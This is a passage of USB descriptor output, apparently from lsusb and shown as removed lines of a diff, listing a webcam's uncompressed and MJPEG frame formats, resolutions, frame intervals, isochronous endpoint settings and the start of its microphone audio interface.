-        dwFrameInterval( 3)            666666
-        dwFrameInterval( 4)           1000000
-        dwFrameInterval( 5)           2000000
-      VideoStreaming Interface Descriptor:
-        bLength                            50
-        bDescriptorType                    36
-        bDescriptorSubtype                  5 (FRAME_UNCOMPRESSED)
-        bFrameIndex                         6
-        bmCapabilities                   0x00
-          Still image unsupported
-        wWidth                            640
-        wHeight                           360
-        dwMinBitRate                 18432000
-        dwMaxBitRate                110592000
-        dwMaxVideoFrameBufferSize      460800
-        dwDefaultFrameInterval         333333
-        bFrameIntervalType                  6
-        dwFrameInterval( 0)            333333
-        dwFrameInterval( 1)            400000
-        dwFrameInterval( 2)            500000
-        dwFrameInterval( 3)            666666
-        dwFrameInterval( 4)           1000000
-        dwFrameInterval( 5)           2000000
-      VideoStreaming Interface Descriptor:
-        bLength                            50
-        bDescriptorType                    36
-        bDescriptorSubtype                  5 (FRAME_UNCOMPRESSED)
-        bFrameIndex                         7
-        bmCapabilities                   0x00
-          Still image unsupported
-        wWidth                            640
-        wHeight                           400
-        dwMinBitRate                 20480000
-        dwMaxBitRate                122880000
-        dwMaxVideoFrameBufferSize      512000
-        dwDefaultFrameInterval         333333
-        bFrameIntervalType                  6
-        dwFrameInterval( 0)            333333
-        dwFrameInterval( 1)            400000
-        dwFrameInterval( 2)            500000
-        dwFrameInterval( 3)            666666
-        dwFrameInterval( 4)           1000000
-        dwFrameInterval( 5)           2000000
-      VideoStreaming Interface Descriptor:
-        bLength                            46
-        bDescriptorType                    36
-        bDescriptorSubtype                  5 (FRAME_UNCOMPRESSED)
-        bFrameIndex                         8
-        bmCapabilities                   0x00
-          Still image unsupported
-        wWidth                            768
-        wHeight                           480
-        dwMinBitRate                 29491200
-        dwMaxBitRate                147456000
-        dwMaxVideoFrameBufferSize      737280
-        dwDefaultFrameInterval         400000
-        bFrameIntervalType                  5
-        dwFrameInterval( 0)            400000
-        dwFrameInterval( 1)            500000
-        dwFrameInterval( 2)            666666
-        dwFrameInterval( 3)           1000000
-        dwFrameInterval( 4)           2000000
-      VideoStreaming Interface Descriptor:
-        bLength                            46
-        bDescriptorType                    36
-        bDescriptorSubtype                  5 (FRAME_UNCOMPRESSED)
-        bFrameIndex                         9
-        bmCapabilities                   0x00
-          Still image unsupported
-        wWidth                            800
-        wHeight                           456
-        dwMinBitRate                 29184000
-        dwMaxBitRate                145920000
-        dwMaxVideoFrameBufferSize      729600
-        dwDefaultFrameInterval         400000
-        bFrameIntervalType                  5
-        dwFrameInterval( 0)            400000
-        dwFrameInterval( 1)            500000
-        dwFrameInterval( 2)            666666
-        dwFrameInterval( 3)           1000000
-        dwFrameInterval( 4)           2000000
-      VideoStreaming Interface Descriptor:
-        bLength                            46
-        bDescriptorType                    36
-        bDescriptorSubtype                  5 (FRAME_UNCOMPRESSED)
-        bFrameIndex                        10
-        bmCapabilities                   0x00
-          Still image unsupported
-        wWidth                            800
-        wHeight                           504
-        dwMinBitRate                 32256000
-        dwMaxBitRate                161280000
-        dwMaxVideoFrameBufferSize      806400
-        dwDefaultFrameInterval         400000
-        bFrameIntervalType                  5
-        dwFrameInterval( 0)            400000
-        dwFrameInterval( 1)            500000
-        dwFrameInterval( 2)            666666
-        dwFrameInterval( 3)           1000000
-        dwFrameInterval( 4)           2000000
-      VideoStreaming Interface Descriptor:
-        bLength                            46
-        bDescriptorType                    36
-        bDescriptorSubtype                  5 (FRAME_UNCOMPRESSED)
-        bFrameIndex                        11
-        bmCapabilities                   0x00
-          Still image unsupported
-        wWidth                            800
-        wHeight                           600
-        dwMinBitRate                 38400000
-        dwMaxBitRate                192000000
-        dwMaxVideoFrameBufferSize      960000
-        dwDefaultFrameInterval         400000
-        bFrameIntervalType                  5
-        dwFrameInterval( 0)            400000
-        dwFrameInterval( 1)            500000
-        dwFrameInterval( 2)            666666
-        dwFrameInterval( 3)           1000000
-        dwFrameInterval( 4)           2000000
-      VideoStreaming Interface Descriptor:
-        bLength                            46
-        bDescriptorType                    36
-        bDescriptorSubtype                  5 (FRAME_UNCOMPRESSED)
-        bFrameIndex                        12
-        bmCapabilities                   0x00
-          Still image unsupported
-        wWidth                            864
-        wHeight                           480
-        dwMinBitRate                 33177600
-        dwMaxBitRate                165888000
-        dwMaxVideoFrameBufferSize      829440
-        dwDefaultFrameInterval         400000
-        bFrameIntervalType                  5
-        dwFrameInterval( 0)            400000
-        dwFrameInterval( 1)            500000
-        dwFrameInterval( 2)            666666
-        dwFrameInterval( 3)           1000000
-        dwFrameInterval( 4)           2000000
-      VideoStreaming Interface Descriptor:
-        bLength                            38
-        bDescriptorType                    36
-        bDescriptorSubtype                  5 (FRAME_UNCOMPRESSED)
-        bFrameIndex                        13
-        bmCapabilities                   0x00
-          Still image unsupported
-        wWidth                            960
-        wHeight                           720
-        dwMinBitRate                 55296000
-        dwMaxBitRate                165888000
-        dwMaxVideoFrameBufferSize     1382400
-        dwDefaultFrameInterval        1000000
-        bFrameIntervalType                  3
-        dwFrameInterval( 0)            666666
-        dwFrameInterval( 1)           1000000
-        dwFrameInterval( 2)           2000000
-      VideoStreaming Interface Descriptor:
-        bLength                            34
-        bDescriptorType                    36
-        bDescriptorSubtype                  5 (FRAME_UNCOMPRESSED)
-        bFrameIndex                        14
-        bmCapabilities                   0x00
-          Still image unsupported
-        wWidth                           1280
-        wHeight                           720
-        dwMinBitRate                 73728000
-        dwMaxBitRate                147456000
-        dwMaxVideoFrameBufferSize     1843200
-        dwDefaultFrameInterval        2000000
-        bFrameIntervalType                  2
-        dwFrameInterval( 0)           1333333
-        dwFrameInterval( 1)           2000000
-      VideoStreaming Interface Descriptor:
-        bLength                            34
-        bDescriptorType                    36
-        bDescriptorSubtype                  5 (FRAME_UNCOMPRESSED)
-        bFrameIndex                        15
-        bmCapabilities                   0x00
-          Still image unsupported
-        wWidth                           1280
-        wHeight                           800
-        dwMinBitRate                 81920000
-        dwMaxBitRate                163840000
-        dwMaxVideoFrameBufferSize     2048000
-        dwDefaultFrameInterval        2000000
-        bFrameIntervalType                  2
-        dwFrameInterval( 0)           1333333
-        dwFrameInterval( 1)           2000000
-      VideoStreaming Interface Descriptor:
-        bLength                            30
-        bDescriptorType                    36
-        bDescriptorSubtype                  5 (FRAME_UNCOMPRESSED)
-        bFrameIndex                        16
-        bmCapabilities                   0x00
-          Still image unsupported
-        wWidth                           1600
-        wHeight                           904
-        dwMinBitRate                115712000
-        dwMaxBitRate                115712000
-        dwMaxVideoFrameBufferSize     2892800
-        dwDefaultFrameInterval        2000000
-        bFrameIntervalType                  1
-        dwFrameInterval( 0)           2000000
-      VideoStreaming Interface Descriptor:
-        bLength                            30
-        bDescriptorType                    36
-        bDescriptorSubtype                  5 (FRAME_UNCOMPRESSED)
-        bFrameIndex                        17
-        bmCapabilities                   0x00
-          Still image unsupported
-        wWidth                           1600
-        wHeight                          1000
-        dwMinBitRate                128000000
-        dwMaxBitRate                128000000
-        dwMaxVideoFrameBufferSize     3200000
-        dwDefaultFrameInterval        2000000
-        bFrameIntervalType                  1
-        dwFrameInterval( 0)           2000000
-      VideoStreaming Interface Descriptor:
-        bLength                            30
-        bDescriptorType                    36
-        bDescriptorSubtype                  5 (FRAME_UNCOMPRESSED)
-        bFrameIndex                        18
-        bmCapabilities                   0x00
-          Still image unsupported
-        wWidth                           1600
-        wHeight                          1200
-        dwMinBitRate                153600000
-        dwMaxBitRate                153600000
-        dwMaxVideoFrameBufferSize     3840000
-        dwDefaultFrameInterval        2000000
-        bFrameIntervalType                  1
-        dwFrameInterval( 0)           2000000
-      VideoStreaming Interface Descriptor:
-        bLength                            79
-        bDescriptorType                    36
-        bDescriptorSubtype                  3 (STILL_IMAGE_FRAME)
-        bEndpointAddress                    0
-        bNumImageSizePatterns              18
-        wWidth( 0)                        640
-        wHeight( 0)                       480
-        wWidth( 1)                        160
-        wHeight( 1)                       120
-        wWidth( 2)                        176
-        wHeight( 2)                       144
-        wWidth( 3)                        320
-        wHeight( 3)                       240
-        wWidth( 4)                        352
-        wHeight( 4)                       288
-        wWidth( 5)                        640
-        wHeight( 5)                       360
-        wWidth( 6)                        640
-        wHeight( 6)                       400
-        wWidth( 7)                        768
-        wHeight( 7)                       480
-        wWidth( 8)                        800
-        wHeight( 8)                       456
-        wWidth( 9)                        800
-        wHeight( 9)                       504
-        wWidth(10)                        800
-        wHeight(10)                       600
-        wWidth(11)                        864
-        wHeight(11)                       480
-        wWidth(12)                        960
-        wHeight(12)                       720
-        wWidth(13)                       1280
-        wHeight(13)                       720
-        wWidth(14)                       1280
-        wHeight(14)                       800
-        wWidth(15)                       1600
-        wHeight(15)                       904
-        wWidth(16)                       1600
-        wHeight(16)                      1000
-        wWidth(17)                       1600
-        wHeight(17)                      1200
-        bNumCompressionPatterns            18
-        bCompression( 0)                    5
-      VideoStreaming Interface Descriptor:
-        bLength                             6
-        bDescriptorType                    36
-        bDescriptorSubtype                 13 (COLORFORMAT)
-        bColorPrimaries                     1 (BT.709,sRGB)
-        bTransferCharacteristics            1 (BT.709)
-        bMatrixCoefficients                 4 (SMPTE 170M (BT.601))
-      VideoStreaming Interface Descriptor:
-        bLength                            11
-        bDescriptorType                    36
-        bDescriptorSubtype                  6 (FORMAT_MJPEG)
-        bFormatIndex                        2
-        bNumFrameDescriptors               18
-        bFlags                              1
-          Fixed-size samples: Yes
-        bDefaultFrameIndex                  1
-        bAspectRatioX                       0
-        bAspectRatioY                       0
-        bmInterlaceFlags                 0x00
-          Interlaced stream or variable: No
-          Fields per frame: 1 fields
-          Field 1 first: No
-          Field pattern: Field 1 only
-          bCopyProtect                      0
-      VideoStreaming Interface Descriptor:
-        bLength                            50
-        bDescriptorType                    36
-        bDescriptorSubtype                  7 (FRAME_MJPEG)
-        bFrameIndex                         1
-        bmCapabilities                   0x00
-          Still image unsupported
-        wWidth                            640
-        wHeight                           480
-        dwMinBitRate                 24576000
-        dwMaxBitRate                147456000
-        dwMaxVideoFrameBufferSize      614400
-        dwDefaultFrameInterval         333333
-        bFrameIntervalType                  6
-        dwFrameInterval( 0)            333333
-        dwFrameInterval( 1)            400000
-        dwFrameInterval( 2)            500000
-        dwFrameInterval( 3)            666666
-        dwFrameInterval( 4)           1000000
-        dwFrameInterval( 5)           2000000
-      VideoStreaming Interface Descriptor:
-        bLength                            50
-        bDescriptorType                    36
-        bDescriptorSubtype                  7 (FRAME_MJPEG)
-        bFrameIndex                         2
-        bmCapabilities                   0x00
-          Still image unsupported
-        wWidth                            160
-        wHeight                           120
-        dwMinBitRate                  1536000
-        dwMaxBitRate                  9216000
-        dwMaxVideoFrameBufferSize       38400
-        dwDefaultFrameInterval         333333
-        bFrameIntervalType                  6
-        dwFrameInterval( 0)            333333
-        dwFrameInterval( 1)            400000
-        dwFrameInterval( 2)            500000
-        dwFrameInterval( 3)            666666
-        dwFrameInterval( 4)           1000000
-        dwFrameInterval( 5)           2000000
-      VideoStreaming Interface Descriptor:
-        bLength                            50
-        bDescriptorType                    36
-        bDescriptorSubtype                  7 (FRAME_MJPEG)
-        bFrameIndex                         3
-        bmCapabilities                   0x00
-          Still image unsupported
-        wWidth                            176
-        wHeight                           144
-        dwMinBitRate                  2027520
-        dwMaxBitRate                 12165120
-        dwMaxVideoFrameBufferSize       50688
-        dwDefaultFrameInterval         333333
-        bFrameIntervalType                  6
-        dwFrameInterval( 0)            333333
-        dwFrameInterval( 1)            400000
-        dwFrameInterval( 2)            500000
-        dwFrameInterval( 3)            666666
-        dwFrameInterval( 4)           1000000
-        dwFrameInterval( 5)           2000000
-      VideoStreaming Interface Descriptor:
-        bLength                            50
-        bDescriptorType                    36
-        bDescriptorSubtype                  7 (FRAME_MJPEG)
-        bFrameIndex                         4
-        bmCapabilities                   0x00
-          Still image unsupported
-        wWidth                            320
-        wHeight                           240
-        dwMinBitRate                  6144000
-        dwMaxBitRate                 36864000
-        dwMaxVideoFrameBufferSize      153600
-        dwDefaultFrameInterval         333333
-        bFrameIntervalType                  6
-        dwFrameInterval( 0)            333333
-        dwFrameInterval( 1)            400000
-        dwFrameInterval( 2)            500000
-        dwFrameInterval( 3)            666666
-        dwFrameInterval( 4)           1000000
-        dwFrameInterval( 5)           2000000
-      VideoStreaming Interface Descriptor:
-        bLength                            50
-        bDescriptorType                    36
-        bDescriptorSubtype                  7 (FRAME_MJPEG)
-        bFrameIndex                         5
-        bmCapabilities                   0x00
-          Still image unsupported
-        wWidth                            352
-        wHeight                           288
-        dwMinBitRate                  8110080
-        dwMaxBitRate                 48660480
-        dwMaxVideoFrameBufferSize      202752
-        dwDefaultFrameInterval         333333
-        bFrameIntervalType                  6
-        dwFrameInterval( 0)            333333
-        dwFrameInterval( 1)            400000
-        dwFrameInterval( 2)            500000
-        dwFrameInterval( 3)            666666
-        dwFrameInterval( 4)           1000000
-        dwFrameInterval( 5)           2000000
-      VideoStreaming Interface Descriptor:
-        bLength                            50
-        bDescriptorType                    36
-        bDescriptorSubtype                  7 (FRAME_MJPEG)
-        bFrameIndex                         6
-        bmCapabilities                   0x00
-          Still image unsupported
-        wWidth                            640
-        wHeight                           360
-        dwMinBitRate                 18432000
-        dwMaxBitRate                110592000
-        dwMaxVideoFrameBufferSize      460800
-        dwDefaultFrameInterval         333333
-        bFrameIntervalType                  6
-        dwFrameInterval( 0)            333333
-        dwFrameInterval( 1)            400000
-        dwFrameInterval( 2)            500000
-        dwFrameInterval( 3)            666666
-        dwFrameInterval( 4)           1000000
-        dwFrameInterval( 5)           2000000
-      VideoStreaming Interface Descriptor:
-        bLength                            50
-        bDescriptorType                    36
-        bDescriptorSubtype                  7 (FRAME_MJPEG)
-        bFrameIndex                         7
-        bmCapabilities                   0x00
-          Still image unsupported
-        wWidth                            640
-        wHeight                           400
-        dwMinBitRate                 20480000
-        dwMaxBitRate                122880000
-        dwMaxVideoFrameBufferSize      512000
-        dwDefaultFrameInterval         333333
-        bFrameIntervalType                  6
-        dwFrameInterval( 0)            333333
-        dwFrameInterval( 1)            400000
-        dwFrameInterval( 2)            500000
-        dwFrameInterval( 3)            666666
-        dwFrameInterval( 4)           1000000
-        dwFrameInterval( 5)           2000000
-      VideoStreaming Interface Descriptor:
-        bLength                            50
-        bDescriptorType                    36
-        bDescriptorSubtype                  7 (FRAME_MJPEG)
-        bFrameIndex                         8
-        bmCapabilities                   0x00
-          Still image unsupported
-        wWidth                            768
-        wHeight                           480
-        dwMinBitRate                 29491200
-        dwMaxBitRate                176947200
-        dwMaxVideoFrameBufferSize      737280
-        dwDefaultFrameInterval         333333
-        bFrameIntervalType                  6
-        dwFrameInterval( 0)            333333
-        dwFrameInterval( 1)            400000
-        dwFrameInterval( 2)            500000
-        dwFrameInterval( 3)            666666
-        dwFrameInterval( 4)           1000000
-        dwFrameInterval( 5)           2000000
-      VideoStreaming Interface Descriptor:
-        bLength                            50
-        bDescriptorType                    36
-        bDescriptorSubtype                  7 (FRAME_MJPEG)
-        bFrameIndex                         9
-        bmCapabilities                   0x00
-          Still image unsupported
-        wWidth                            800
-        wHeight                           456
-        dwMinBitRate                 29184000
-        dwMaxBitRate                175104000
-        dwMaxVideoFrameBufferSize      729600
-        dwDefaultFrameInterval         666666
-        bFrameIntervalType                  6
-        dwFrameInterval( 0)            333333
-        dwFrameInterval( 1)            400000
-        dwFrameInterval( 2)            500000
-        dwFrameInterval( 3)            666666
-        dwFrameInterval( 4)           1000000
-        dwFrameInterval( 5)           2000000
-      VideoStreaming Interface Descriptor:
-        bLength                            50
-        bDescriptorType                    36
-        bDescriptorSubtype                  7 (FRAME_MJPEG)
-        bFrameIndex                        10
-        bmCapabilities                   0x00
-          Still image unsupported
-        wWidth                            800
-        wHeight                           504
-        dwMinBitRate                 32256000
-        dwMaxBitRate                193536000
-        dwMaxVideoFrameBufferSize      806400
-        dwDefaultFrameInterval         666666
-        bFrameIntervalType                  6
-        dwFrameInterval( 0)            333333
-        dwFrameInterval( 1)            400000
-        dwFrameInterval( 2)            500000
-        dwFrameInterval( 3)            666666
-        dwFrameInterval( 4)           1000000
-        dwFrameInterval( 5)           2000000
-      VideoStreaming Interface Descriptor:
-        bLength                            50
-        bDescriptorType                    36
-        bDescriptorSubtype                  7 (FRAME_MJPEG)
-        bFrameIndex                        11
-        bmCapabilities                   0x00
-          Still image unsupported
-        wWidth                            800
-        wHeight                           600
-        dwMinBitRate                 38400000
-        dwMaxBitRate                230400000
-        dwMaxVideoFrameBufferSize      960000
-        dwDefaultFrameInterval         666666
-        bFrameIntervalType                  6
-        dwFrameInterval( 0)            333333
-        dwFrameInterval( 1)            400000
-        dwFrameInterval( 2)            500000
-        dwFrameInterval( 3)            666666
-        dwFrameInterval( 4)           1000000
-        dwFrameInterval( 5)           2000000
-      VideoStreaming Interface Descriptor:
-        bLength                            50
-        bDescriptorType                    36
-        bDescriptorSubtype                  7 (FRAME_MJPEG)
-        bFrameIndex                        12
-        bmCapabilities                   0x00
-          Still image unsupported
-        wWidth                            864
-        wHeight                           480
-        dwMinBitRate                 33177600
-        dwMaxBitRate                199065600
-        dwMaxVideoFrameBufferSize      829440
-        dwDefaultFrameInterval         666666
-        bFrameIntervalType                  6
-        dwFrameInterval( 0)            333333
-        dwFrameInterval( 1)            400000
-        dwFrameInterval( 2)            500000
-        dwFrameInterval( 3)            666666
-        dwFrameInterval( 4)           1000000
-        dwFrameInterval( 5)           2000000
-      VideoStreaming Interface Descriptor:
-        bLength                            50
-        bDescriptorType                    36
-        bDescriptorSubtype                  7 (FRAME_MJPEG)
-        bFrameIndex                        13
-        bmCapabilities                   0x00
-          Still image unsupported
-        wWidth                            960
-        wHeight                           720
-        dwMinBitRate                 55296000
-        dwMaxBitRate                331776000
-        dwMaxVideoFrameBufferSize     1382400
-        dwDefaultFrameInterval        1000000
-        bFrameIntervalType                  6
-        dwFrameInterval( 0)            333333
-        dwFrameInterval( 1)            400000
-        dwFrameInterval( 2)            500000
-        dwFrameInterval( 3)            666666
-        dwFrameInterval( 4)           1000000
-        dwFrameInterval( 5)           2000000
-      VideoStreaming Interface Descriptor:
-        bLength                            50
-        bDescriptorType                    36
-        bDescriptorSubtype                  7 (FRAME_MJPEG)
-        bFrameIndex                        14
-        bmCapabilities                   0x00
-          Still image unsupported
-        wWidth                           1280
-        wHeight                           720
-        dwMinBitRate                 73728000
-        dwMaxBitRate                442368000
-        dwMaxVideoFrameBufferSize     1843200
-        dwDefaultFrameInterval        1000000
-        bFrameIntervalType                  6
-        dwFrameInterval( 0)            333333
-        dwFrameInterval( 1)            400000
-        dwFrameInterval( 2)            500000
-        dwFrameInterval( 3)            666666
-        dwFrameInterval( 4)           1000000
-        dwFrameInterval( 5)           2000000
-      VideoStreaming Interface Descriptor:
-        bLength                            46
-        bDescriptorType                    36
-        bDescriptorSubtype                  7 (FRAME_MJPEG)
-        bFrameIndex                        15
-        bmCapabilities                   0x00
-          Still image unsupported
-        wWidth                           1280
-        wHeight                           800
-        dwMinBitRate                 81920000
-        dwMaxBitRate                409600000
-        dwMaxVideoFrameBufferSize     2048000
-        dwDefaultFrameInterval        1000000
-        bFrameIntervalType                  5
-        dwFrameInterval( 0)            400000
-        dwFrameInterval( 1)            500000
-        dwFrameInterval( 2)            666666
-        dwFrameInterval( 3)           1000000
-        dwFrameInterval( 4)           2000000
-      VideoStreaming Interface Descriptor:
-        bLength                            34
-        bDescriptorType                    36
-        bDescriptorSubtype                  7 (FRAME_MJPEG)
-        bFrameIndex                        16
-        bmCapabilities                   0x00
-          Still image unsupported
-        wWidth                           1600
-        wHeight                           904
-        dwMinBitRate                115712000
-        dwMaxBitRate                231424000
-        dwMaxVideoFrameBufferSize     2892800
-        dwDefaultFrameInterval        1000000
-        bFrameIntervalType                  2
-        dwFrameInterval( 0)           1000000
-        dwFrameInterval( 1)           2000000
-      VideoStreaming Interface Descriptor:
-        bLength                            34
-        bDescriptorType                    36
-        bDescriptorSubtype                  7 (FRAME_MJPEG)
-        bFrameIndex                        17
-        bmCapabilities                   0x00
-          Still image unsupported
-        wWidth                           1600
-        wHeight                          1000
-        dwMinBitRate                128000000
-        dwMaxBitRate                256000000
-        dwMaxVideoFrameBufferSize     3200000
-        dwDefaultFrameInterval        1000000
-        bFrameIntervalType                  2
-        dwFrameInterval( 0)           1000000
-        dwFrameInterval( 1)           2000000
-      VideoStreaming Interface Descriptor:
-        bLength                            34
-        bDescriptorType                    36
-        bDescriptorSubtype                  7 (FRAME_MJPEG)
-        bFrameIndex                        18
-        bmCapabilities                   0x00
-          Still image unsupported
-        wWidth                           1600
-        wHeight                          1200
-        dwMinBitRate                153600000
-        dwMaxBitRate                307200000
-        dwMaxVideoFrameBufferSize     3840000
-        dwDefaultFrameInterval        2000000
-        bFrameIntervalType                  2
-        dwFrameInterval( 0)           1000000
-        dwFrameInterval( 1)           2000000
-      VideoStreaming Interface Descriptor:
-        bLength                            83
-        bDescriptorType                    36
-        bDescriptorSubtype                  3 (STILL_IMAGE_FRAME)
-        bEndpointAddress                    0
-        bNumImageSizePatterns              18
-        wWidth( 0)                        640
-        wHeight( 0)                       480
-        wWidth( 1)                        160
-        wHeight( 1)                       120
-        wWidth( 2)                        176
-        wHeight( 2)                       144
-        wWidth( 3)                        320
-        wHeight( 3)                       240
-        wWidth( 4)                        352
-        wHeight( 4)                       288
-        wWidth( 5)                        640
-        wHeight( 5)                       360
-        wWidth( 6)                        640
-        wHeight( 6)                       400
-        wWidth( 7)                        768
-        wHeight( 7)                       480
-        wWidth( 8)                        800
-        wHeight( 8)                       456
-        wWidth( 9)                        800
-        wHeight( 9)                       504
-        wWidth(10)                        800
-        wHeight(10)                       600
-        wWidth(11)                        864
-        wHeight(11)                       480
-        wWidth(12)                        960
-        wHeight(12)                       720
-        wWidth(13)                       1280
-        wHeight(13)                       720
-        wWidth(14)                       1280
-        wHeight(14)                       800
-        wWidth(15)                       1600
-        wHeight(15)                       904
-        wWidth(16)                       1600
-        wHeight(16)                      1000
-        wWidth(17)                       1600
-        wHeight(17)                      1200
-        bNumCompressionPatterns            18
-        bCompression( 0)                    5
-        bCompression( 1)                   10
-        bCompression( 2)                   15
-        bCompression( 3)                   20
-        bCompression( 4)                   25
-      VideoStreaming Interface Descriptor:
-        bLength                             6
-        bDescriptorType                    36
-        bDescriptorSubtype                 13 (COLORFORMAT)
-        bColorPrimaries                     1 (BT.709,sRGB)
-        bTransferCharacteristics            1 (BT.709)
-        bMatrixCoefficients                 4 (SMPTE 170M (BT.601))
-    Interface Descriptor:
-      bLength                 9
-      bDescriptorType         4
-      bInterfaceNumber        1
-      bAlternateSetting       1
-      bNumEndpoints           1
-      bInterfaceClass        14 Video
-      bInterfaceSubClass      2 Video Streaming
-      bInterfaceProtocol      0 
-      iInterface              0 
-      Endpoint Descriptor:
-        bLength                 7
-        bDescriptorType         5
-        bEndpointAddress     0x81  EP 1 IN
-        bmAttributes            5
-          Transfer Type            Isochronous
-          Synch Type               Asynchronous
-          Usage Type               Data
-        wMaxPacketSize     0x00c0  1x 192 bytes
-        bInterval               1
-    Interface Descriptor:
-      bLength                 9
-      bDescriptorType         4
-      bInterfaceNumber        1
-      bAlternateSetting       2
-      bNumEndpoints           1
-      bInterfaceClass        14 Video
-      bInterfaceSubClass      2 Video Streaming
-      bInterfaceProtocol      0 
-      iInterface              0 
-      Endpoint Descriptor:
-        bLength                 7
-        bDescriptorType         5
-        bEndpointAddress     0x81  EP 1 IN
-        bmAttributes            5
-          Transfer Type            Isochronous
-          Synch Type               Asynchronous
-          Usage Type               Data
-        wMaxPacketSize     0x0180  1x 384 bytes
-        bInterval               1
-    Interface Descriptor:
-      bLength                 9
-      bDescriptorType         4
-      bInterfaceNumber        1
-      bAlternateSetting       3
-      bNumEndpoints           1
-      bInterfaceClass        14 Video
-      bInterfaceSubClass      2 Video Streaming
-      bInterfaceProtocol      0 
-      iInterface              0 
-      Endpoint Descriptor:
-        bLength                 7
-        bDescriptorType         5
-        bEndpointAddress     0x81  EP 1 IN
-        bmAttributes            5
-          Transfer Type            Isochronous
-          Synch Type               Asynchronous
-          Usage Type               Data
-        wMaxPacketSize     0x0200  1x 512 bytes
-        bInterval               1
-    Interface Descriptor:
-      bLength                 9
-      bDescriptorType         4
-      bInterfaceNumber        1
-      bAlternateSetting       4
-      bNumEndpoints           1
-      bInterfaceClass        14 Video
-      bInterfaceSubClass      2 Video Streaming
-      bInterfaceProtocol      0 
-      iInterface              0 
-      Endpoint Descriptor:
-        bLength                 7
-        bDescriptorType         5
-        bEndpointAddress     0x81  EP 1 IN
-        bmAttributes            5
-          Transfer Type            Isochronous
-          Synch Type               Asynchronous
-          Usage Type               Data
-        wMaxPacketSize     0x0280  1x 640 bytes
-        bInterval               1
-    Interface Descriptor:
-      bLength                 9
-      bDescriptorType         4
-      bInterfaceNumber        1
-      bAlternateSetting       5
-      bNumEndpoints           1
-      bInterfaceClass        14 Video
-      bInterfaceSubClass      2 Video Streaming
-      bInterfaceProtocol      0 
-      iInterface              0 
-      Endpoint Descriptor:
-        bLength                 7
-        bDescriptorType         5
-        bEndpointAddress     0x81  EP 1 IN
-        bmAttributes            5
-          Transfer Type            Isochronous
-          Synch Type               Asynchronous
-          Usage Type               Data
-        wMaxPacketSize     0x0320  1x 800 bytes
-        bInterval               1
-    Interface Descriptor:
-      bLength                 9
-      bDescriptorType         4
-      bInterfaceNumber        1
-      bAlternateSetting       6
-      bNumEndpoints           1
-      bInterfaceClass        14 Video
-      bInterfaceSubClass      2 Video Streaming
-      bInterfaceProtocol      0 
-      iInterface              0 
-      Endpoint Descriptor:
-        bLength                 7
-        bDescriptorType         5
-        bEndpointAddress     0x81  EP 1 IN
-        bmAttributes            5
-          Transfer Type            Isochronous
-          Synch Type               Asynchronous
-          Usage Type               Data
-        wMaxPacketSize     0x03b0  1x 944 bytes
-        bInterval               1
-    Interface Descriptor:
-      bLength                 9
-      bDescriptorType         4
-      bInterfaceNumber        1
-      bAlternateSetting       7
-      bNumEndpoints           1
-      bInterfaceClass        14 Video
-      bInterfaceSubClass      2 Video Streaming
-      bInterfaceProtocol      0 
-      iInterface              0 
-      Endpoint Descriptor:
-        bLength                 7
-        bDescriptorType         5
-        bEndpointAddress     0x81  EP 1 IN
-        bmAttributes            5
-          Transfer Type            Isochronous
-          Synch Type               Asynchronous
-          Usage Type               Data
-        wMaxPacketSize     0x0a80  2x 640 bytes
-        bInterval               1
-    Interface Descriptor:
-      bLength                 9
-      bDescriptorType         4
-      bInterfaceNumber        1
-      bAlternateSetting       8
-      bNumEndpoints           1
-      bInterfaceClass        14 Video
-      bInterfaceSubClass      2 Video Streaming
-      bInterfaceProtocol      0 
-      iInterface              0 
-      Endpoint Descriptor:
-        bLength                 7
-        bDescriptorType         5
-        bEndpointAddress     0x81  EP 1 IN
-        bmAttributes            5
-          Transfer Type            Isochronous
-          Synch Type               Asynchronous
-          Usage Type               Data
-        wMaxPacketSize     0x0b20  2x 800 bytes
-        bInterval               1
-    Interface Descriptor:
-      bLength                 9
-      bDescriptorType         4
-      bInterfaceNumber        1
-      bAlternateSetting       9
-      bNumEndpoints           1
-      bInterfaceClass        14 Video
-      bInterfaceSubClass      2 Video Streaming
-      bInterfaceProtocol      0 
-      iInterface              0 
-      Endpoint Descriptor:
-        bLength                 7
-        bDescriptorType         5
-        bEndpointAddress     0x81  EP 1 IN
-        bmAttributes            5
-          Transfer Type            Isochronous
-          Synch Type               Asynchronous
-          Usage Type               Data
-        wMaxPacketSize     0x0be0  2x 992 bytes
-        bInterval               1
-    Interface Descriptor:
-      bLength                 9
-      bDescriptorType         4
-      bInterfaceNumber        1
-      bAlternateSetting      10
-      bNumEndpoints           1
-      bInterfaceClass        14 Video
-      bInterfaceSubClass      2 Video Streaming
-      bInterfaceProtocol      0 
-      iInterface              0 
-      Endpoint Descriptor:
-        bLength                 7
-        bDescriptorType         5
-        bEndpointAddress     0x81  EP 1 IN
-        bmAttributes            5
-          Transfer Type            Isochronous
-          Synch Type               Asynchronous
-          Usage Type               Data
-        wMaxPacketSize     0x1380  3x 896 bytes
-        bInterval               1
-    Interface Descriptor:
-      bLength                 9
-      bDescriptorType         4
-      bInterfaceNumber        1
-      bAlternateSetting      11
-      bNumEndpoints           1
-      bInterfaceClass        14 Video
-      bInterfaceSubClass      2 Video Streaming
-      bInterfaceProtocol      0 
-      iInterface              0 
-      Endpoint Descriptor:
-        bLength                 7
-        bDescriptorType         5
-        bEndpointAddress     0x81  EP 1 IN
-        bmAttributes            5
-          Transfer Type            Isochronous
-          Synch Type               Asynchronous
-          Usage Type               Data
-        wMaxPacketSize     0x13fc  3x 1020 bytes
-        bInterval               1
-    Interface Association:
-      bLength                 8
-      bDescriptorType        11
-      bFirstInterface         2
-      bInterfaceCount         2
-      bFunctionClass          1 Audio
-      bFunctionSubClass       2 Streaming
-      bFunctionProtocol       0 
-      iFunction               0 
-    Interface Descriptor:
-      bLength                 9
-      bDescriptorType         4
-      bInterfaceNumber        2
-      bAlternateSetting       0
-      bNumEndpoints           0
-      bInterfaceClass         1 Audio
-      bInterfaceSubClass      1 Control Device
-      bInterfaceProtocol      0 
-      iInterface              0 
-      AudioControl Interface Descriptor:
-        bLength                 9
-        bDescriptorType        36
-        bDescriptorSubtype      1 (HEADER)
-        bcdADC               1.00
-        wTotalLength           38
-        bInCollection           1
-        baInterfaceNr( 0)       3
-      AudioControl Interface Descriptor:
-        bLength                12
-        bDescriptorType        36
-        bDescriptorSubtype      2 (INPUT_TERMINAL)
-        bTerminalID             1
-        wTerminalType      0x0201 Microphone
-        bAssocTerminal          0
-        bNrChannels             1
-        wChannelConfig     0x0000
-        iChannelNames           0 
-        iTerminal               0 
-      AudioControl Interface Descriptor:
-        bLength                 9
-        bDescriptorType        36
